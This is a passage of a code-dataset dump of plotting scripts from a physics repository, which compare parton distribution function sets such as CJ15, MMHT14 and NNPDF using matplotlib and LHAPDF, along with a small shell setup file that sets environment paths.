L.append(labelmap[k])\naxR.legend(H,L,loc=1,frameon=0,fontsize=20)\n\n# info\naxL.text(0.1,0.1,'$Q^2=%0.0f$'%(Q2)+tex('~GeV^2'),transform=axL.transAxes,size=20)\n\n# the end\npy.savefig('gallery/xpdf.pdf')\n" }, { "alpha_fraction": 0.587598443031311, "alphanum_fraction": 0.6476377844810486, "avg_line_length": 25.736841201782227, "blob_id": "5565d85f55a986450140d3581cec6cff113988e8", "content_id": "f06e231415ef8a51a37509179aae43fd199b0267", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1016, "license_type": "no_license", "max_line_length": 63, "num_lines": 38, "path": "/sharespace/codes/other/strange.py", "repo_name": "Jeff182/CJ", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport sys,os\nsys.path.insert(1,'../../')\nimport numpy as np\nimport pylab as py\nimport tools\nfrom tools import tex,plot_band,fill_between\nimport lhapdf\nimport matplotlib.gridspec as gridspec\nfrom matplotlib import rc\nrc('font',**{'family':'sans-serif','sans-serif':['Helvetica']})\nrc('text',usetex=True)\nfrom master import COMPOSER,FITPACK,COMPOSER4NNPDF\n##################################################\n\n#NNPDF=COMPOSER4NNPDF('NNPDF30_nlo_as_0118')\nNNPDF=COMPOSER4NNPDF('NNPDF30_nlo_as_0118_nolhc_1000')\n\nMMHT14=COMPOSER('MMHT2014nlo68cl')\n\nax=py.subplot(111)\nQ2=1\n#X=np.linspace(1e-3,1,100)\nX=10**np.linspace(-3,0,100)\nD=NNPDF.get_xpdf('s',X=X,Q2=Q2)\nax.plot(X,D['xf0'],'r-',label='NNPDF')\nax.plot(X,D['xf0']-D['dxf-'],'r:')\nax.plot(X,D['xf0']+D['dxf+'],'r:')\n\nD=MMHT14.get_xpdf('s',X=X,Q2=Q2)\nax.plot(X,D['xf0'],'b-',label='MMHT')\nax.plot(X,D['xf0']-D['dxf-'],'b:')\nax.plot(X,D['xf0']+D['dxf+'],'b:')\n\nax.legend(frameon=0)\nax.semilogx()\nax.set_ylim(0,1)\npy.savefig('gallery/strange.pdf')\n" }, { "alpha_fraction": 0.6978417038917542, "alphanum_fraction": 0.730215847492218, "avg_line_length": 44.83333206176758, "blob_id": "bd186684790bc5b539339d65e62bf6e027d63e53", "content_id": "1b10b5080ae78c383441f7aa97f037e82f847ce1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 278, "license_type": "no_license", "max_line_length": 58, "num_lines": 6, "path": "/setup.sh", "repo_name": "Jeff182/CJ", "src_encoding": "UTF-8", "text": "setenv LHAPDF_DATA_PATH /u/group/cteqX/apps/LHAPDF6\nsetenv PATH /site/bin:${PATH}\nsetenv PATH /apps/tmux/1.9a/bin:${PATH}\nsetenv PATH /apps/vim/vim-7.4/bin:${PATH}\nsetenv PATH /apps/python/python-2.7.7-anaconda/bin:${PATH}\nsetenv PATH /u/group/cteqX/apps/LHAPDF6/bin:${PATH}\n\n\n\n" }, { "alpha_fraction": 0.5214693546295166, "alphanum_fraction": 0.5795482993125916, "avg_line_length": 27.373239517211914, "blob_id": "26b3f3cd97a5346feaac9baf8aca9d73f8735955", "content_id": "3578adf6137c03f22405969c713c7cbdbef07c57", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4029, "license_type": "no_license", "max_line_length": 78, "num_lines": 142, "path": "/sharespace/codes/other/CJ15.py", "repo_name": "Jeff182/CJ", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport sys,os\nsys.path.insert(1,'../../')\nimport numpy as np\nimport pylab as py\nimport tools\nfrom tools import tex,plot_band,fill_between\nimport lhapdf\nimport matplotlib.gridspec as gridspec\nfrom matplotlib import rc\nrc('font',**{'family':'sans-serif','sans-serif':['Helvetica']})\nrc('text',usetex=True)\nfrom master import FITPACK\n\n\n# initialize PDF instances\n# CJ12min=lhapdf.mkPDFs('CJ12min')\n\n# dictionary for PDG flav index\npdgmap= {'u':2,'d':1,'ub':-2,'db': -1,'s':3,'g':21}\n\n# load CJ15 from fitpack data \nCJ15 = {}\nCJ15['KP_AV18'] = FITPACK().get_PDFs('data/CJ15_NLO_KP_AV18.pdf')\nCJ15['KP_CDBONN'] = FITPACK().get_PDFs('data/CJ15_NLO_KP_CDBONN.pdf')\nCJ15['KP_WJC1'] = FITPACK().get_PDFs('data/CJ15_NLO_KP_WJC1.pdf')\nCJ15['KP_WJC2'] = FITPACK().get_PDFs('data/CJ15_NLO_KP_WJC2.pdf')\n#CJ15['tst_AV18_KP'] = FITPACK().get_PDFs('data/tst_AV18_KP.pdf')\n#CJ15['tst_CDBONN_KP'] = FITPACK().get_PDFs('data/tst_CDBONN_KP.pdf')\n#CJ15['tst_WJC1_KP'] = FITPACK().get_PDFs('data/tst_WJC1_KP.pdf')\n#CJ15['tst_WJC2_KP'] = FITPACK().get_PDFs('data/tst_WJC2_KP.pdf')\n\n# dictionary for labels\nlabmap = {}\nlabmap['u'] = '$xu$'\nlabmap['d'] = '$xd$'\nlabmap['ub'] = r'$x\\bar{u}$'\nlabmap['db'] = r'$x\\bar{d}$'\nlabmap['s'] = '$xs$'\nlabmap['g'] = '$xg$'\nlabmap['du'] = '$d/u$'\nlabmap['dbub'] = r'$\\bar{d}/\\bar{u}$'\n\n# dictionary for grp == groups \ngrpmap = {}\ngrpmap['KP_AV18'] = {'color':'r-'}\ngrpmap['KP_CDBONN'] = {'color':'g-'}\ngrpmap['KP_WJC1'] = {'color':'b-'}\ngrpmap['KP_WJC2'] = {'color':'k:'}\n#grpmap['tst_AV18_KP'] = {'color':'r-'}\n#grpmap['tst_CDBONN_KP'] = {'color':'g-'}\n#grpmap['tst_WJC1_KP'] = {'color':'b-'}\n#grpmap['tst_WJC2_KP'] = {'color':'k:'}\n\n# dictionary for ylims \nymap = {}\nymap['u'] ={'min':0.0,'max':0.8}\nymap['d'] ={'min':0.0,'max':0.8}\nymap['du'] ={'min':0.0,'max':1.0}\nymap['dbub']={'min':0.6,'max':2.0}\nymap['ub']={'min':0.0,'max':0.6}\nymap['db']={'min':0.0,'max':0.6}\nymap['s'] ={'min':0.0,'max':0.6}\nymap['g'] ={'min':0.0,'max':10.0}\n\n# dictionary for plot location \ngs = gridspec.GridSpec(4,2) # specify plotting grid geometry\ngs.update(left=0.1,right=0.98,wspace=0.25,hspace=0.65,top=0.98,bottom=0.1)\ngrid = {}\ngrid['u'] = gs[0,0]\ngrid['d'] = gs[0,1]\ngrid['du'] = gs[1,0]\ngrid['dbub']= gs[1,1]\ngrid['ub']= gs[2,0]\ngrid['db']= gs[2,1]\ngrid['s'] = gs[3,0]\ngrid['g'] = gs[3,1]\n\n\n# setup kinematics\nQ2=10.0\niset=0\n\n\n# make plot\nfor flav in ['u','d','ub','db','s','g','du','dbub']:\n\n ax=py.subplot(grid[flav])\n\n for grp in ['KP_AV18','KP_CDBONN','KP_WJC1','KP_WJC2']:\n\n cj15 = CJ15[grp]\n X=cj15['Q2'][Q2]['x']\n if flav!='du' and flav!='dbub':\n central=cj15['Q2'][Q2]['x'+flav]\n error=cj15['Q2'][Q2]['err-x'+flav]*10\n elif flav=='du':\n central=cj15['Q2'][Q2]['d/u']\n error=cj15['Q2'][Q2]['err-d/u']*10\n elif flav=='dbub':\n central=cj15['Q2'][Q2]['db/ub']\n error=cj15['Q2'][Q2]['err-db/ub']*10\n\n if grp!='KP_AV18':\n ax.plot(X,central,grpmap[grp]['color'],label=tex(grp.replace('KP_','')))\n else:\n p1,=ax.plot(X,central,grpmap[grp]['color'])\n p2=fill_between(X,central-error,central+error,ax=ax,\n facecolor='#FFFF00',\n edgecolor='#FFFF00',\n alpha=1.0,hatch=None)\n\n # make legend\n if flav=='d':\n H_,L_ = ax.get_legend_handles_labels()\n H=[(p2,p1)]\n L=[tex('AV18')]\n for h in H_: H.append(h)\n for l in L_: L.append(l)\n ax.legend(H,L,loc=1,frameon=0,fontsize=8)\n\n # setup axis \n #if flav!='s' and flav!='g': ax.set_xticks([])\n ax.set_xlim(0.0,1.0)\n if flav=='dbub': ax.set_xlim(0.0,0.4)\n if flav=='ub' or flav=='db' or flav=='s' or flav=='g':\n ax.semilogx()\n ax.set_xlim(1e-3,1.0)\n\n ax.set_ylim(ymap[flav]['min'],ymap[flav]['max'])\n ax.set_xlabel('$x$',size=20)\n ax.set_ylabel(labmap[flav],size=20)\n\n # write info\n if flav=='u': \n ax.text(0.75,0.6,tex('CJ15'),\n transform=ax.transAxes,size=15)\n ax.text(0.06,0.15,'$Q^2=$'+tex('~10~GeV^2'),\n transform=ax.transAxes,size=12)\n\n#py.show()\npy.savefig('plots/CJ15fits.pdf')\n" }, { "alpha_fraction": 0.5071646571159363, "alphanum_fraction": 0.5695076584815979, "avg_line_length": 29.805438995361328, "blob_id": "749a118957031c1a2b6dced982da9866c799b3db", "content_id": "10058ad2971b330ebf82629df1f7d86f9d2fab50", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 14725, "license_type": "no_license", "max_line_length": 106, "num_lines": 478, "path": "/sharespace/codes/ratio.py", "repo_name": "Jeff182/CJ", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport sys,os\nsys.path.insert(1,'../../')\nimport numpy as np\nimport pylab as py\nimport tools\nfrom tools import tex,plot_band,fill_between\nimport lhapdf\nimport matplotlib.gridspec as gridspec\nfrom matplotlib import rc\nrc('font',**{'family':'sans-serif','sans-serif':['Helvetica']})\nrc('text',usetex=True)\n#params={'text.latex.preamble': \\\n# [r\"\\usepackage{upgreek}\",\n# r\"\\usepackage[nice]{units}\",\n# r\"\\usepackage{amstext}\"\n# ]}\n#py.rcParams.update(params)\n\nfrom master import COMPOSER,FITPACK,COMPOSER4NNPDF\n\n# plotting functions with LR capabilities\n\ndef get_LR(gsL,gsR):\n # construct (L)eft panel\n axL=py.subplot(gsL)\n axL.spines['right'].set_visible(False)\n axL.yaxis.set_ticks_position('left')\n axL.axvline(0.1,color='k',ls='--',alpha=0.5)\n \n # construct (R)ight panel\n axR=py.subplot(gsR)\n axR.spines['left'].set_visible(False)\n axR.axes.yaxis.set_ticklabels([])\n axR.axes.get_yaxis().set_ticks([])\n return [axL,axR]\n\ndef plotI(AX,Q2,central,other,flav,color,ls,T=1,hatch=None,alpha=0.4,facecolor='none',edgecolor='none'):\n \"\"\"\n This routine plots a ratio band of 'other' to 'central' using the error from 'other'\n \"\"\"\n\n axL,axR=AX[flav]\n XL=10**np.linspace(-4,-1,100)\n if flav=='u' or flav=='d' or flav=='g':\n XR=np.linspace(0.1,0.95,100)\n else:\n XR=np.linspace(0.1,0.5,100)\n LC=central.get_xpdf(flav,X=XL,Q2=Q2)\n RC=central.get_xpdf(flav,X=XR,Q2=Q2)\n LO=other.get_xpdf(flav,X=XL,Q2=Q2)\n RO=other.get_xpdf(flav,X=XR,Q2=Q2)\n\n axL.plot(XL,LO['xf0']/LC['xf0'],color=color,ls=ls)\n p1,=axR.plot(XR,RO['xf0']/RC['xf0'],color=color,ls=ls,label=flav)\n\n fill_between(XL,\n (LO['xf0']-LO['dxf-']*T)/LC['xf0'],\n (LO['xf0']+LO['dxf+']*T)/LC['xf0'],\n ax=axL,\n facecolor=facecolor,\n edgecolor=edgecolor,\n alpha=alpha,\n hatch=hatch)\n p2=fill_between(XR,\n (RO['xf0']-RO['dxf-']*T)/RC['xf0'],\n (RO['xf0']+RO['dxf+']*T)/RC['xf0'],\n ax=axR,\n facecolor=facecolor,\n edgecolor=edgecolor,\n alpha=alpha,\n hatch=hatch)\n\n axL.set_xlim(np.amin(XL),0.1)\n axR.set_xlim(0.1,np.amax(XR))\n return (p2,p1)\n\ndef plotII(AX,Q2,central,other,flav,color,ls,T=1,hatch=None,alpha=0.4,facecolor='none',edgecolor='none'):\n \"\"\"\n This routine plots a ratio (only central) of 'other' to 'central' using the error from 'other'\n \"\"\"\n\n axL,axR=AX[flav]\n XL=10**np.linspace(-4,-1,100)\n if flav=='u' or flav=='d' or flav=='g':\n XR=np.linspace(0.1,0.95,100)\n else:\n XR=np.linspace(0.1,0.5,100)\n LC=central.get_xpdf(flav,X=XL,Q2=Q2)\n RC=central.get_xpdf(flav,X=XR,Q2=Q2)\n LO=other.get_xpdf(flav,X=XL,Q2=Q2)\n RO=other.get_xpdf(flav,X=XR,Q2=Q2)\n\n axL.plot(XL,LO['xf0']/LC['xf0'],color=color,ls=ls)\n p1,=axR.plot(XR,RO['xf0']/RC['xf0'],color=color,ls=ls,label=flav)\n\n axL.set_xlim(np.amin(XL),0.1)\n axR.set_xlim(0.1,np.amax(XR))\n return p1\n\n# ploting function without LR \n\ndef plotI0(AX,Q2,central,other,flav,color,ls,T=1,hatch=None,alpha=0.4,facecolor='none',edgecolor='none'):\n \"\"\"\n This routine plots a ratio band of 'other' to 'central' \n using the error from 'other'\n \"\"\"\n\n ax=AX[flav]\n if flav=='u' or flav=='d' or flav=='g':\n X=np.linspace(1e-4,0.95,100)\n else:\n X=np.linspace(1e-4,0.5,100)\n C=central.get_xpdf(flav,X=X,Q2=Q2)\n O=other.get_xpdf(flav,X=X,Q2=Q2)\n\n ax.plot(X,O['xf0']/C['xf0'],color=color,ls=ls)\n p1,=ax.plot(X,O['xf0']/C['xf0'],color=color,ls=ls,label=flav)\n\n p2=fill_between(X,\n (O['xf0']-O['dxf-']*T)/C['xf0'],\n (O['xf0']+O['dxf+']*T)/C['xf0'],\n ax=ax,\n facecolor=facecolor,\n edgecolor=edgecolor,\n alpha=alpha,\n hatch=hatch)\n return (p2,p1)\n\ndef plotII0(AX,Q2,central,other,flav,color,ls,T=1,hatch=None,alpha=0.4,facecolor='none',edgecolor='none'):\n \"\"\"\n This routine plots a ratio (only central) of \n 'other' to 'central' using the error from 'other'\n \"\"\"\n\n ax=AX[flav]\n if flav=='u' or flav=='d' or flav=='g':\n X=np.linspace(1e-4,0.95,100)\n else:\n X=np.linspace(1e-4,0.5,100)\n C=central.get_xpdf(flav,X=X,Q2=Q2)\n O=other.get_xpdf(flav,X=X,Q2=Q2)\n\n ax.plot(X,O['xf0']/C['xf0'],color=color,ls=ls)\n p1,=ax.plot(X,O['xf0']/C['xf0'],color=color,ls=ls,label=flav)\n return p1\n\n# main routines\n\ndef ratio():\n\n ###############################\n # plot geometry\n ###############################\n # set gloabl figure dimensions\n nrows=3\n ncols=2\n py.figure(figsize=(ncols*4,nrows*3))\n\n # construct LR AXs for each flav \n AX={}\n\n # left side LR panels\n gs = gridspec.GridSpec(nrows,ncols)\n gs.update(left=0.1,right=0.48,wspace=0,hspace=0.3,\\\n top=0.98,bottom=0.05)\n AX['u'] =get_LR(gs[0,0],gs[0,1])\n AX['ub']=get_LR(gs[1,0],gs[1,1])\n AX['s'] =get_LR(gs[2,0],gs[2,1])\n\n # right side LR panels\n gs = gridspec.GridSpec(nrows,ncols)\n gs.update(left=0.58,right=0.98,wspace=0,hspace=0.3,\\\n top=0.98,bottom=0.05)\n AX['d'] =get_LR(gs[0,0],gs[0,1])\n AX['db']=get_LR(gs[1,0],gs[1,1])\n AX['g'] =get_LR(gs[2,0],gs[2,1])\n\n \n ###############################\n # plot content \n ###############################\n # initialize composer for each pdf set\n CJ=COMPOSER('CJ15_NLO_KP_AV18')\n HERA15=COMPOSER('HERAPDF15NLO_EIG')\n MMHT14=COMPOSER('MMHT2014nlo68cl')\n NNPDF=COMPOSER4NNPDF('NNPDF30_nlo_as_0118')\n #CT10=COMPOSER('CT10nlo')\n \n Q2=10\n for flav in ['u','d','ub','db','s','g']:\n print 'plotting '+flav\n\n # the output of plot used to construct specialized \n # legend marker\n p1=plotI(AX,Q2,CJ,CJ,flav,'yellow','-',T=10,\\\n hatch=None,alpha=0.4,facecolor='yellow',edgecolor='yellow')\n p2=plotI(AX,Q2,CJ,CJ,flav,'r','-',T=1,\\\n hatch=None,alpha=1.0,facecolor='r',edgecolor='none')\n p3=plotI(AX,Q2,CJ,MMHT14,flav,'b','-',T=1,\\\n hatch='...',alpha=0.4,facecolor='none',edgecolor='b')\n p4=plotI(AX,Q2,CJ,HERA15,flav,'g','-',T=1,\\\n hatch='...',alpha=0.4,facecolor='none',edgecolor='g')\n p5=plotI(AX,Q2,CJ,NNPDF,flav,'m','-',T=1,\\\n hatch='...',alpha=0.4,facecolor='none',edgecolor='m')\n #p5=plotI(AX,Q2,CJ,CT10,flav,'k','-',T=1,\\\n # hatch='\\\\',alpha=0.4,facecolor='none',edgecolor='k')\n \n\n# print single PDF as a function of x (grafted onto ratio.py code)\n if flav=='db':\n X=np.linspace(0.01,1.0,100) \n mm=MMHT14.get_xpdf(flav,X=X,Q2=4.0)\n t=1\n for i in range(X.size):\n l='%0.2f %0.2e %0.2e %0.2e' \n print l%(X[i],X[i]*mm['xf0'][i],X[i]*mm['dxf-'][i]*t,X[i]*mm['dxf+'][i]*t)\n #l='%0.2f %0.2e %0.2e'\n #print l%(X[i],X[i]*mm['xf0'][i],X[i]*mm['dxf'][i]*t)\n ax=py.subplot(111)\n ax.plot(X,X*mm['xf0'],'r-')\n ax.plot(X,X*mm['xf0']-X*mm['dxf-']*t,'r:')\n ax.plot(X,X*mm['xf0']+X*mm['dxf+']*t,'r:')\n #ax.plot(X,X*mm['xf0']-mm['dxf']*t,'r:')\n #ax.plot(X,X*mm['xf0']+mm['dxf']*t,'r:') \n py.show()\n sys.exit()\n\n\n\n #retrieve LR ax for further proccesing \n axL,axR=AX[flav]\n\n # plot specialized legend marker at the specific flav panel\n if flav=='d':\n H=[p1,p2,p3,p4,p5]\n L=[tex('CJ15')+'\\ ($T=10$)'\\\n ,tex('CJ15')+'\\ ($T=1$)'\\\n ,tex('MMHT14')\\\n ,tex('HERA15')\\\n ,tex('NNPDF3.0')]\n # ,tex('CT10')]\n axR.legend(H,L,frameon=0,fontsize=11,\\\n bbox_to_anchor=(0.05, 1.0))\n if flav=='u':\n axR.text(0.1,0.85,'$Q^2=%0.0f$'%(Q2)+tex('~GeV^2'),\\\n transform=axL.transAxes,size=15)\n\n # plot some text at specific flav panel\n #if flav=='d':\n # axL.text(0.06,0.1,'$T=10$',transform=axL.transAxes,size=20)\n\n # set ylims\n if flav=='u':\n ymin,ymax=0.795,1.205\n if flav=='d':\n ymin,ymax=0.6,1.7\n if flav=='s':\n ymin,ymax=0.6,1.9\n if flav=='g' or flav=='ub' or flav=='db':\n ymin,ymax=0.7,1.3\n #axL.set_yticks(np.arange(0.2,2.0,0.4))\n axL.set_ylim(ymin,ymax)\n axR.set_ylim(ymin,ymax)\n\n # set x axis\n axL.semilogx()\n axL.set_xticks(10**np.linspace(-4,-2,3))\n if flav=='u' or flav=='d':\n axR.set_xticks(np.arange(0.1,1.1,0.2))\n axR.set_xlim(0.1,0.95)\n else:\n axR.set_xticks(np.arange(0.1,0.4,0.1))\n axR.set_xlim(0.1,0.4)\n\n # set labels\n if flav=='db': _flav=r'\\bar{d}'\n elif flav=='ub': _flav=r'\\bar{u}'\n else: _flav=flav\n axL.set_ylabel(r'$%s/%s$\\large$_{\\rm CJ15}$'%(_flav,_flav),size=20)\n axL.set_xlabel('$x$',size=20)\n axL.xaxis.set_label_coords(1.0,-0.08,transform=axL.transAxes)\n\n py.savefig('gallery/ratio.pdf')\n\ndef ratio_wfn():\n\n ###############################\n # plot geometry\n ###############################\n # set gloabl figure dimensions\n nrows=3\n ncols=2\n py.figure(figsize=(ncols*4,nrows*3))\n\n # construct LR AXs for each flav \n AX={}\n gs = gridspec.GridSpec(nrows,ncols)\n gs.update(left=0.1,right=0.98,wspace=0.3,hspace=0.3,top=0.98,bottom=0.08)\n AX['u'] =py.subplot(gs[0,0]) \n AX['ub']=py.subplot(gs[1,0])\n AX['s'] =py.subplot(gs[2,0])\n AX['d'] =py.subplot(gs[0,1])\n AX['db']=py.subplot(gs[1,1])\n AX['g'] =py.subplot(gs[2,1])\n\n\n ###############################\n # plot content \n ###############################\n\n CJ15={'KP':{},'fmKP':{}}\n CJ15['KP']['AV18' ] =COMPOSER('CJ15_NLO_KP_AV18')\n CJ15['KP']['CDBONN'] =COMPOSER('CJ15_NLO_KP_CDBONN',central_only=True)\n CJ15['KP']['WJC1' ] =COMPOSER('CJ15_NLO_KP_WJC1',central_only=True)\n CJ15['KP']['WJC2' ] =COMPOSER('CJ15_NLO_KP_WJC2',central_only=True)\n CJ15['fmKP']['AV18'] =COMPOSER('CJ15_NLO_fmKP_AV18',central_only=True)\n CJ15['fmKP']['CDBONN']=COMPOSER('CJ15_NLO_fmKP_CDBONN',central_only=True)\n CJ15['fmKP']['WJC1'] =COMPOSER('CJ15_NLO_fmKP_WJC1',central_only=True)\n CJ15['fmKP']['WJC2'] =COMPOSER('CJ15_NLO_fmKP_WJC2',central_only=True)\n \n Q2=10\n for flav in ['u','d','ub','db','s','g']:\n print flav\n p1=plotI0(AX,Q2,CJ15['KP']['AV18'],CJ15['KP']['AV18'],flav,'yellow','-',\n T=1,hatch=None,alpha=0.4,facecolor='yellow',edgecolor='none')\n p2=plotII0(AX,Q2,CJ15['KP']['AV18'],CJ15['KP']['CDBONN'],flav,'r','-',\n T=1,hatch=None,alpha=0.4,facecolor='b',edgecolor='none')\n p3=plotII0(AX,Q2,CJ15['KP']['AV18'],CJ15['KP']['WJC1'],flav,'g','--',\n T=1,hatch=None,alpha=0.4,facecolor='g',edgecolor='none')\n p4=plotII0(AX,Q2,CJ15['KP']['AV18'],CJ15['KP']['WJC2'],flav,'b','-',\n T=1,hatch=None,alpha=0.4,facecolor='y',edgecolor='none')\n \n ax=AX[flav]\n\n if flav=='u':\n H=[p1,p2,p3,p4]\n L=[tex('CJ15\\ (AV18)')+r'$\\ \\ \\ T=1$',tex('CDBonn'),tex('WJC1'),tex('WJC2')]\n ax.legend(H,L,frameon=0,fontsize=10, bbox_to_anchor=(0.65, 1.0))\n ax.text(0.06,0.1,'$Q^2=%0.0f$'%(Q2)+tex('~GeV^2'),\\\n transform=ax.transAxes,size=15)\n\n # set ylims\n if flav=='d':\n ymin,ymax=0.85,1.15\n elif flav=='u':\n ymin,ymax=0.95,1.05\n elif flav=='g':\n ymin,ymax=0.9,1.1\n else:\n ymin,ymax=0.95,1.05\n ax.set_ylim(ymin,ymax)\n\n # set x axis\n if flav=='u' or flav=='d' or flav=='g':\n #ax.set_xticks(np.arange(0.1,1.1,0.2))\n ax.set_xlim(0,0.95)\n elif flav=='g':\n ax.set_xlim(0,0.8)\n else:\n #ax.set_xticks(np.arange(0.1,0.5,0.1))\n ax.set_xlim(0,0.5)\n\n # set labels\n if flav=='db': _flav=r'\\bar{d}'\n elif flav=='ub': _flav=r'\\bar{u}'\n else: _flav=flav\n ax.set_ylabel(r'$%s/%s$\\large$_{\\rm CJ15}$'%(_flav,_flav),size=20)\n ax.set_xlabel('$x$',size=20)\n if flav=='u' or flav=='d' or flav=='g':\n xticklabels=[0,0.2,0.4,0.6,0.8]\n \n py.savefig('gallery/ratio_wfn.pdf')\n\ndef ratio_off():\n\n ###############################\n # plot geometry\n ###############################\n # set gloabl figure dimensions\n nrows=3\n ncols=2\n py.figure(figsize=(ncols*4,nrows*3))\n\n # construct LR AXs for each flav \n AX={}\n gs = gridspec.GridSpec(nrows,ncols)\n gs.update(left=0.1,right=0.98,wspace=0.3,hspace=0.3,top=0.98,bottom=0.08)\n AX['u'] =py.subplot(gs[0,0]) \n AX['ub']=py.subplot(gs[1,0])\n AX['s'] =py.subplot(gs[2,0])\n AX['d'] =py.subplot(gs[0,1])\n AX['db']=py.subplot(gs[1,1])\n AX['g'] =py.subplot(gs[2,1])\n\n\n ###############################\n # plot content \n ###############################\n \n CJ15={'KP':{},'fmKP':{}}\n CJ15['KP']['AV18' ] =COMPOSER('CJ15_NLO_KP_AV18')\n CJ15['KP']['CDBONN'] =COMPOSER('CJ15_NLO_KP_CDBONN',central_only=True)\n CJ15['KP']['WJC1' ] =COMPOSER('CJ15_NLO_KP_WJC1',central_only=True)\n CJ15['KP']['WJC2' ] =COMPOSER('CJ15_NLO_KP_WJC2',central_only=True)\n CJ15['fmKP']['AV18'] =COMPOSER('CJ15_NLO_fmKP_AV18',central_only=True)\n CJ15['fmKP']['CDBONN']=COMPOSER('CJ15_NLO_fmKP_CDBONN',central_only=True)\n CJ15['fmKP']['WJC1'] =COMPOSER('CJ15_NLO_fmKP_WJC1',central_only=True)\n CJ15['fmKP']['WJC2'] =COMPOSER('CJ15_NLO_fmKP_WJC2',central_only=True)\n \n Q2=10\n for flav in [ 'u','d','ub','db','s','g']:\n print flav\n p1=plotI0(AX,Q2,CJ15['KP']['AV18'],CJ15['KP']['AV18'],flav,'y','-',\n T=1,hatch=None,alpha=0.4,facecolor='yellow',edgecolor='none')\n p2=plotII0(AX,Q2,CJ15['KP']['AV18'],CJ15['fmKP']['AV18'],flav,'k',':',\n T=1,hatch=None,alpha=0.4,facecolor='k',edgecolor='none')\n p3=plotII0(AX,Q2,CJ15['KP']['AV18'],CJ15['fmKP']['CDBONN'],flav,'r','-',\n T=1,hatch=None,alpha=0.4,facecolor='b',edgecolor='none')\n p4=plotII0(AX,Q2,CJ15['KP']['AV18'],CJ15['fmKP']['WJC1'],flav,'g','--',\n T=1,hatch=None,alpha=0.4,facecolor='g',edgecolor='none')\n p5=plotII0(AX,Q2,CJ15['KP']['AV18'],CJ15['fmKP']['WJC2'],flav,'b','-',\n T=1,hatch=None,alpha=0.4,facecolor='y',edgecolor='none')\n \n ax=AX[flav]\n\n if flav=='d':\n H=[p1,p2,p3,p4,p5]\n L=[tex('CJ15\\ (AV18)'),tex('AV18+OCS'),tex('CDBonn+OCS'),tex('WJC1+OCS'),tex('WJC2+OCS')]\n ax.legend(H,L,frameon=0,fontsize=10, bbox_to_anchor=(0.55, 0.55))\n if flav=='u':\n ax.text(0.06,0.85,'$Q^2=%0.0f$'%(Q2)+tex('~GeV^2'),\\\n transform=ax.transAxes,size=15)\n\n # set ylims\n if flav=='d':\n ymin,ymax=0.8,1.1\n elif flav=='u':\n ymin,ymax=0.95,1.05\n elif flav=='g':\n ymin,ymax=0.9,1.1\n else:\n ymin,ymax=0.95,1.05\n ax.set_ylim(ymin,ymax)\n\n # set x axis\n if flav=='u' or flav=='d' or flav=='g':\n #ax.set_xticks(np.arange(0.1,1.1,0.2))\n ax.set_xlim(0,0.95)\n elif flav=='g':\n ax.set_xlim(0,0.8)\n else:\n #ax.set_xticks(np.arange(0.1,0.5,0.1))\n ax.set_xlim(0,0.5)\n\n # set labels\n if flav=='db': _flav=r'\\bar{d}'\n elif flav=='ub': _flav=r'\\bar{u}'\n else: _flav=flav\n ax.set_ylabel(r'$%s/%s$\\large$_{\\rm CJ15}$'%(_flav,_flav),size=20)\n ax.set_xlabel('$x$',size=20)\n if flav=='u' or flav=='d' or flav=='g':\n xticklabels=[0,0.2,0.4,0.6,0.8]\n \n # set labels\n if flav=='db': _flav=r'\\bar{d}'\n elif flav=='ub': _flav=r'\\bar{u}'\n else: _flav=flav\n ax.set_ylabel(r'$%s/%s$\\large$_{\\rm CJ15}$'%(_flav,_flav),size=20)\n ax.set_xlabel('$x$',size=20)\n \n py.savefig('gallery/ratio_off.pdf')\n\n\nif __name__=='__main__':\n ratio()\n #ratio_wfn()\n #ratio_off()\n" }, { "alpha_fraction": 0.6143518686294556, "alphanum_fraction": 0.6796296238899231, "avg_line_length": 34.40983581542969, "blob_id": "e36e1114279858ef8effd90a4de028e021ba0f1e", "content_id": "b959bf23fa0b27a25a7c0ed6e4b3f4b0500483c8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2160, "license_type": "no_license", "max_line_length": 103, "num_lines": 61, "path": "/sharespace/codes/dou.py", "repo_name": "Jeff182/CJ", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport sys,os\nsys.path.insert(1,'../../')\nimport numpy as np\nimport pylab as py\nimport tools\nfrom tools import tex,plot_band,fill_between\nimport lhapdf\nimport matplotlib.gridspec as gridspec\nfrom matplotlib import rc\nrc('font',**{'family':'sans-serif','sans-serif':['Times-Roman']})\nrc('text',usetex=True)\nfrom master import COMPOSER,FITPACK,COMPOSER4NNPDF\n\ndef plot_dou(ax,com,Q2,X,color,ls='-',T=1,hatch=None,alpha=0.4,facecolor='none',edgecolor='none'):\n dou=com.get_dou(X=X,Q2=Q2)\n #ax.plot(X,dou['central'],color=color,ls=ls)\n #p1,=ax.plot(X,dou['central'],color=color,ls=ls)\n p2=fill_between(X,\n (dou['central']-dou['asym err -']*T),\n (dou['central']+dou['asym err +']*T),\n ax=ax,\n facecolor=facecolor,\n edgecolor=edgecolor,\n alpha=alpha,\n hatch=hatch)\n #return (p2,p1)\n return 